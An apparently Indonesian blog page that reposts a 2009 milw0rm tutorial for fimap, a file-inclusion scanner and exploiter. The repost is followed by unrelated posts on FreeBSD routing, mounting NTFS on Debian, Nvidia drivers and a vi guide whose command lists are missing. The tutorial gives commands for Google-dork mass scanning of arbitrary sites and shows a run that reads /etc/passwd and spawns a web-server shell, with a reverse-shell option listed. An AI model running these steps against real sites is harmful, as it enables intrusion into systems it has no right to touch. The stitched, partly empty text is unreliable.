Gipsylinux’s Area

Title : LFI/RFI testing and exploiting with fimap
Autor : Iman Karim (ikarim2s[YOUKNOW]smail.inf.fh-brs.de)
Date : 3. September 2009
Project: http://fimap.googlecode.com

fimap is currently under development but still usable. Feel free to test it!
This document and tool is not recommend for people who doesn’t know what LFI/RFI is.
If you know what it is, it might be a handy tool for you.

Table of Contents
0. Introduction
[a] What is fimap?
[b] Let’s go.
1. Single URL Scan
[a] Why?
[b] Ok – show me how.
2. Mass Scan
3. Google Scan
4. Obtaining a shell
5. Full Example Run
6. Last Words
7. Greetings

[0] INTRODUCTION
[a] What is fimap?
fimap is a Local- and Remote-File-Injection scanner and exploiter written by me.
It’s released under GPLv2 and you can download it at http://fimap.googlecode.com

[b] LET’S GO
Befor we start make sure that you don’t use fimap for illegal stuff.
Use it only on your own site to test if your inclusions are secure or not.
You use it at your own risk and I don’t take any responsibility for it.
Ok – Let’s go then!

[1] SINGLE URL SCAN
[a] Why?
Sometimes I am playing on my websites GET variables in the browser to check for inclusion bugs.
When I actually find something fimap is my friend. I can simply give him the URL I found and fimap
will do the rest for me.

[b] Ok – show me how.
It’s very easy to start a single url scan.
Simply start fimap using the -u or –url parameter:

imax@DevelB0x:~$ ./fimap.py -u “http://localhost/vulnerable.php?inc=index.php”

If fimap has found an Inclusion-Bug, you will see a box like this:

###################################################################################
#[1] Possible File Injection #
###################################################################################
# [URL] http://localhost/vulnerable.php?inc=index #
# [PARAM] inc #
# [PATH] /var/www #
# [TYPE] Absolute Clean + Remote injection #
# [NULLBYTE] No Need. It’s clean. #
# [READABLE FILES] #
# [0] /etc/passwd #
# [1] php://input #
# [2] http://www.phpbb.de/index.php #
# [3] http://www.uni-bonn.de/Frauengeschichte/index.html #
# [4] http://www.kah-bonn.de/index.htm?presse/winterthur.htm #
###################################################################################

You can see that we actually have readable files. Some of them are usable to inject code – some not.
fimap will automaticly log every valuable result to ‘~/fimap_results.xml’. The XML will never be deleted.
All new results will be injected correctly into the XML. Feel free to delete it if you want.
Possible injections which can’t be successfully exploited by fimap will be logged into a dirty
csv file: ‘~/fimap.log’

Well, that’s it for single url scanning!
If you want to spawn a shell using your newly found bug(s) watch [4]

[2] MASS SCAN
Mass scanning is very similar to single url scanning. The only difference is (you guess it):
you can scan a whole txt (each line = one url) for inclusion bugs.
Just like in single url mode everything will be logged to the log files.
To use mass mode use:

imax@DevelB0x:~$ ./fimap.py -m -l “/tmp/myurllist.txt”

[3] GOOGLE SCAN
Same as mass scan. But instead of getting the urls from a txt-list it will use google to get urls.
To use google mode use:

imax@DevelB0x:~$ ./fimap.py -g -q ‘inurl:”include.php”‘
or
imax@DevelB0x:~$ ./fimap.py -g -q ‘inurl:”req.php” -svn -trak -cvs’

[4] OBTAINING A SHELL
If you have found some inclusion bugs you can directly make use of them!
Simply call:

imax@DevelB0x:~$ ./fimap.py -x

fimap will ask you some questions and then you should have a shell!

[5] FULL EXAMPLE RUN

[CMD]imax@DevelB0x:~$ ./fimap.py -u “http://localhost/vulnerable.php?inc=index.php”
fimap v.01 by Iman Karim – Automatic LFI/RFI scanner and exploiter.
SingleScan is testing URL: ‘http://localhost/vulnerable.php?inc=index.php’
[OUT] Parsing URL ‘http://localhost/vulnerable.php?inc=index.php’…
[INFO] Fiddling around with URL…
[OUT] Possible file inclusion found! -> ‘http://localhost/vulnerable.php?inc=bUTeWg6j’ with Parameter ‘inc’.
[OUT] Identifing Vulnerability ‘http://localhost/vulnerable.php?inc=index.php’ with Key ‘inc’…
[INFO] Scriptpath received: ‘/var/www’
[INFO] Testing file ‘/etc/passwd’…
[INFO] Testing file ‘/proc/self/environ’…
[INFO] Testing file ‘php://input’…
[INFO] Testing file ‘http://www.phpbb.de/index.php’…
[INFO] Testing file ‘http://www.uni-bonn.de/Frauengeschichte/index.html’…
[INFO] Testing file ‘http://www.kah-bonn.de/index.htm?presse/winterthur.htm’…
###################################################################################
#[1] Possible File Injection #
###################################################################################
# [URL] http://localhost/vulnerable.php?inc=index.php #
# [PARAM] inc #
# [PATH] /var/www #
# [TYPE] Absolute Clean + Remote injection #
# [NULLBYTE] No Need. It’s clean. #
# [READABLE FILES] #
# [0] /etc/passwd #
# [1] php://input #
# [2] http://www.phpbb.de/index.php #
# [3] http://www.uni-bonn.de/Frauengeschichte/index.html #
# [4] http://www.kah-bonn.de/index.htm?presse/winterthur.htm #
###################################################################################
[CMD]imax@DevelB0x:~$ ./fimap.py -x
fimap v.01 by Iman Karim – Automatic LFI/RFI scanner and exploiter.
###################
#List of Domains #
###################
#[1] localhost #
###################
Choose Domain: 1
###############################################################################################
#FI Bugs on localhost #
###############################################################################################
#[1] URL: ‘/vulnerable.php?inc=index.php’ injecting file: ‘php://input’ using param: ‘inc’ #
###############################################################################################
Choose vulnerable script: 1
[INFO] Testing code injection thru POST…
[OUT] PHP Injection works! Testing if execution works…
[OUT] Testing execution thru ‘popen’…
#################################
#Available Attacks #
#################################
#[1] Spawn Shell #
#[2] Create reverse shell… #
#################################
Choose Attack: 1
——————————————-
Welcome to fimap shell!
Better don’t start interactive commands!
Enter ‘q’ to exit the shell.
——————————————-
fimap_shell$> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
fimap_shell$> uname -a
Linux DevelB0x 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
fimap_shell$> q

See ya dude!

[6] LAST WORDS
You can configure most of the attack vectors in the config.py file inside your fimap directory.
The file is documentated. So check the file for more infos. All I can say here is that if you
want the full advantage of RFI attacks you should configure your settings["dynamic_rfi"] dict.
Please remember that fimap is currently under a week old and under heavy development.
Goto http://fimap.googlecode.com and stay tuned about updates.
To check out the lastest code use:
svn checkout http://fimap.googlecode.com/svn/trunk/ fimap

I don’t know and currently don’t care if it works on windows. Works fine on Unixes.
If you find a bug feel free to report it.
I hope you like it.

[7] GREETINGS
Greetings to: rita, exorzist, invisible, ruun, beatkeeper, dextrous

Afghans can code too!

# milw0rm.com [2009-09-03]
Sumber http://milw0rm.com/papers/377

Berikut adalah materi pelajaran TIK agar dipelajari secara mandiri untuk kelas X (X.6, X.2, X.KI), jika ada pertanyaan silahkan bertanya di pertemuan berikutnya.
Silahkan download

Silahkan Download
Atau download disini

Silahkan download

Atau download disini

SELAMAT BELAJAR

Ebook ini adalah materi kuliah kelas karyawan dari Universitas Mercu Buana. Ebook tentang jaringan komputer yang terdiri dari 2 bagian.

Bagian I membahas tentang :
Pengenalan Jaringan
Terminologi Networking
MAN SAN VPN
Bandwidth dan OSI Layer
Type dan Jenis Kabel
Fiber Optik
NAT
DHCP
Koneksi Jaringan Di Linux

Bagian 2 membahas tentang :
Ethernet Switching
Spanning Tree Protocol
TCP/IP Model
Subnetting
Quiz dan Tutorial Packet Tracert
Routed dan Routing Protocol
Praktikum Perintah Command DOS
VLSM(Virtual Length Subnet Mask)
OSPF(Open Shortest Path First)
EIGRP(Enhanced IGRP)
Virtual LAN
PPP(Point to Point Protocol)
Praktikum Basic Konfigirasi CISCO
Monitoring Jaringan dengan Ethereal

Silahkan Download Bagian1,  Bagian2

Rancangan Simulasi

Tidak seperti Linux yang mengidentifikasi ethernet dengan eth0, eth1,eth2 …(ethx),  FreeBSD mengidentifikasi ethernet dengan nama yang berbeda-beda tergantung mereknya.  Disini saya menggunakan rl0, mungkin di PC anda ethernet diidentifikasi dengan nama yang berbeda

PC Jaka
Setting IP dan routing ke Router dengan membuka file /etc/rc.conf menggunakan teks editor vi
#vi /etc/rc.conf
ifconfig_rl0=”inet 192.168.1.1 netmask 255.255.255.0″
defaultrouter=”192.168.1.5″

Restart jaringan dan routing
# /etc/rc.d/netif restart && /etc/rc.d/routing restart

PC Dara
Setting IP dan routing ke Router dengan membuka file /etc/rc.conf menggunakan teks editor vi

#vi /etc/rc.conf
ifconfig_rl0=”inet 192.168.2.1 netmask 255.255.255.0″
defaultrouter=”192.168.2.5″

Restart jaringan dan routing
# /etc/rc.d/netif restart && /etc/rc.d/routing restart

PC Router
Setting IP dan mengaktifkan router dengan membuka file /etc/rc.conf menggunakan teks editor vi

#vi /etc/rc.conf
ifconfig_rl0=”inet 192.168.1.5 netmask 255.255.255.0″
ifconfig_rl0_alias0=”inet 192.168.2.5 netmask 255.255.255.0″
gateway_enable=”YES”

Restart jaringan dan router
# /etc/rc.d/netif restart && /etc/rc.d/routing restart

Silahkan download versi PDF

Salah satu hal yang sempet membuat saya klabakan saat memakai Debian Lenny yaitu saya tidak bisa memount drive ntfs seperti yang pernah saya lakukan pada Distro yang lain dengan menambahkan baris berikut pada /etc/fstab

/dev/hda1 /media/windows auto defaults 0 0

Huaaaaa…… knapa nih…… sempet berfikir untuk ganti distro saja. Namun saya tetep menginginkan Debian yang menghuni laptop saya . Dengan bantuan profesor google akhirnya saya menemukan jawabannya. Berikut adalah langkah-langkah yang saya lakukan :

1. install 2 file berikut menggunakan apt-get install

apt-get install libfuse2
apt-get install ntfs-3g

2. cek partisi

fdisk -l | grep NTFS

kita umpamakan ntfs yang akan kita mount adalah /dev/hda1

3. buat direktori windows didalam /media

mkdir /media/windows

4. edit file /etc/fstab menggunakan vi

vi /etc/fstab

5. lalu tambahkan baris berikut di dalam /etc/fstab

/dev/hda1 /media/windows ntfs-3g defaults 0 0

6. restart PC

init 6

Yup… intinya adalah menambahkan 2 file tambahan yaitu: libfuse2 dan ntfs-3g

Good Luck

Sedikit sharing setelah sekian lama tidak mengupdate blog. Kali ini mengenai instalasi driver Nvidia Gforce 5200 pada distro Debian Lenny. Awalnya saya juga kebingungan kenapa driver yang disediakan oleh website resmi http://packages.debian.org tidak ngefek apa-apa, sampai-sampai saya ulang berkali-kali instalasi drivernya bahkan Linuxnya hiks..hiks… Akhirnya saya menemukan jawabannya yaitu dengan menggunakan aplikasi sgfxi. Aplikasi inilah yang akan menginstallkan driver untuk kita.

Langkah-langkah yang saya lakukan adalah

1. Pindah ke direktori /usr/local/bin, mendownload sgfxi dari smxi.org, lalu mengubah permission sgfxi

cd /usr/local//bin/;wget -Nc smxi.org/sgfxi;chmod +x sgfxi

2. Matikan Display Manager

/etc/init.d/gdm stop

3. Menjalankan sgfxi dengan login sebagi root

sgfxi

Lalu tinggal mengikuti langkah-langkah yang muncul selama proses instalasi.

Good Luck

Editor Teks vi

Pada suatu sistem operasi editor teks mempunyai peranan yang cukup penting diantaranya digunakan untuk mengedit file konfigurasi, membuat dokumentasi dan membuat program. vi merupakan editor teks standar yang digunakan di lingkungan Linux dan Unix.

Memulai vi

Untuk memulai vi ketikkan salah satu perintah berikut :

Modus Operasi

Modus operasi pada editor vi terdiri dari dua macam, yaitu :

Pergerakan Kursor

Untuk menggerakkan kursor selain menggunakan tombol panah juga dapat menggunakan
perintah-perintah sebagai berikut:

Menyisipkan Teks

Pada waktu pertama kali membuka sebuah file, maka anda akan berada pada modus instruksi. Untuk memasuki modus edit dapat menggunakan tombol-tombol sebagai berikut :

Menghapus Teks

Menyimpan File dan Keluar dari vi.

Untuk menyimpan file dapat digunakan perintah-perintah sebagai berikut :

Copy, Cut, Paste

Untuk melakukan  cut & paste atau  copy & paste, anda dapat melakukannya dengan perintah
berikut:

Penggantian Teks

Untuk mengganti teks anda dapat menggunakan perintah-perintah sebagai berikut:

Membatalkan perintah sebelumnya – undo

Setelah melakukan perintah pada modus instruksi anda dapat membatalkannya dengan menekan
tombol:

Membuka dokumen lain sewaktu mengedit file

Untuk membuka dokumen lain pada waktu anda mengedit suatu dokumen dapat menggunakan perintah (hanya dapat membuka satu dokumen):

Keluar sementara dari vi dan mengeksekusi perintah

Pada waktu mengedit dokumen, anda dapat melakukan beberapa perintah Linux yang lain dengan menggunakan perintah sebagai berikut:

Masih dari diktat kuliah Universitas Gunadharma yang ditulis oleh D. Suryadi H.S. yang berjudul “Pengenalan Komputer”, yang berisi tentang :

1. Perkembangan Komputer
2. Pengolahan Data dengan Komputer
3. Komputer dan Prosesor
4. Mengenal Hardware Komputer
5. Media Penyimpanan
6. Mengenal Struktur dan Penyajian Data dalam Komputer
7. Komunikasi Data dan Jaringan Komputer
8. Sistem Informasi Komputer dan Aplikasinya
9. Instalasi Komputer dan Organisasinya
10. Software

Silahkan download
PengenalanKomputer.rar